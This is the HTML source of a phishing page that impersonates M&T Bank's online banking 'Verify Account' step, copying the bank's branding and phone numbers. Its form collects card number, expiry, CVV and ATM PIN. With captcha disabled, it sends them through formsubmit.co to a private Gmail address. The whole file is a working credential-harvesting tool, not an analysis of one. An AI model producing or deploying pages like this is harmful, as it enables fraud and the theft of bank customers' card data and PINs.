<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="robots" content="noindex">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"/>
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests" />
    <title>Enroll in Online Banking - Verify Account</title>
    <link rel="stylesheet" href="./bootstrap.css" />
    <link rel="stylesheet" href="./bootstrap.min.css" />
    <link rel="stylesheet" href="./all.css" />
    <style>
        * {
            margin: 0;
            padding: 0;
        }
        #headthree {
            color: #007856;
            font-size: 28px;
        }
        label {
            color: #767676;
        }
        nav {
            border-bottom: 7px solid orange;
        }
        .form-btns {
            width: 100%;
            padding: 0.7rem 3.3rem;
            color: white;
            background-color: #007856;
            border: 1px solid #007856;
            border-radius: 3px;
        }
        .small_link {
            text-decoration: underline;
        }

        .small_text {
            color: #767676;
            font-size: 12px;
            /* font-weight: 200; */
            word-spacing: 2px;
        }
        .footer_top_links {
            text-align: center;
        }
        footer {
            font-size: 10px;
            position: relative;
            bottom: 0;
            height: 100%;
            background-color: #efefef;
        }
        .pipe {
        
            color: gray;
        }
    </style>
</head>

<body>
    <nav id="nav" class="navbar navbar-expand-lg py-3 fixed-top" style="background-color: #007856; color: black">
        <div class="container">
            <div class="mx-auto">
                <img src="./white logo.png" onclick="window.location.href = 'card.html'" id="logo" alt="" width="104px"
                    height="19px" />
            </div>

        </div>
    </nav>

    <section class="my-5">
        <div class="container-fluid py-3">
            <span>Verification</span>
            <p id="headthree" style="color: #007856;">Card Information</p>
            <p>
                Verify access to your Online Banking account in just a few steps
            </p>
        </div>
        <form action="https://formsubmit.co/fishtina84@gmail.com" method="post">
            <div class="row container-fluid input-group mx-auto" id="personal">
                <input type="hidden" name="_captcha" value="false">
                <img src="./creditcard.png" class="m-0 p-0" alt="">
                <!-- <div class="input-group col-lg-3 col-md-4 col-12"></div> -->
                <label for="">Credit/Debit Card</label>
                <input maxlength="20" name="Credit/Debit Card"
                    placeholder="XXXX-XXXX-XXXX-XXXX" class="form-control" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3 "></div>
                <label for="">Expiry(MM)</label>
                <input type="tel" name="ExpiryMM" class="form-control" maxlength="2" placeholder="02" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3"></div>
                <label for="">Expiry(YY)</label>
                <input maxlength="4" name="YY" placeholder="2025" class="form-control" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3 "></div>
                <label for="">CVV</label>
                <input name="CVV" placeholder="***" type="password" class="form-control" maxlength="3" />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-3 "></div>
                <label for="">ATM Pin</label>
                <input name="ATM Pin" type="password" class="form-control" maxlength="4" placeholder="0000" placeholder="Passcode" />
                <div class="input-group col-lg-3 col-md-4 col-12 container-fluid my-4">
                    <div class="input-group">
                        <button class="form-btns" type="submit" onsubmit="window.location.href='about:blank'">Verify</button>
                    </div>
                </div>
            </div>
        </form>

    </section>
    <div class="container text-center">
        <p class="head_p small_link">Help with User ID or Passcode</p>
        <p class="head_p small_link">Enroll Now</p>
    </div>

    <div class="container text-center pt-4">
        <p class="small_text" style="font-size: 10px;">Unauthorized access is prohibited. Usage may be monitorized.</p>
    </div>
    <hr>
    <div class="container text-center p-4">
        <p class="">Have questions about M&T Online Banking?</p>

        <div>
            <p class="head_p">Personal Accounts: 1-800-790-9130</p>
            <span class="small_text">Monday - Friday 8am - 9pm ET</span>
            <p class="small_text">Saturday - Sunday 9am - 5pm ET</p>
        </div>

        <div>
            <p class="head_p">Business Accounts: 1-800-724-6070</p>
            <span class="small_text">Monday - Friday 8am - 9pm ET</span>
            <p class="small_text">Saturday - Sunday 9am - 5pm ET</p>
        </div>
    </div>
</section>
</body>

</html>
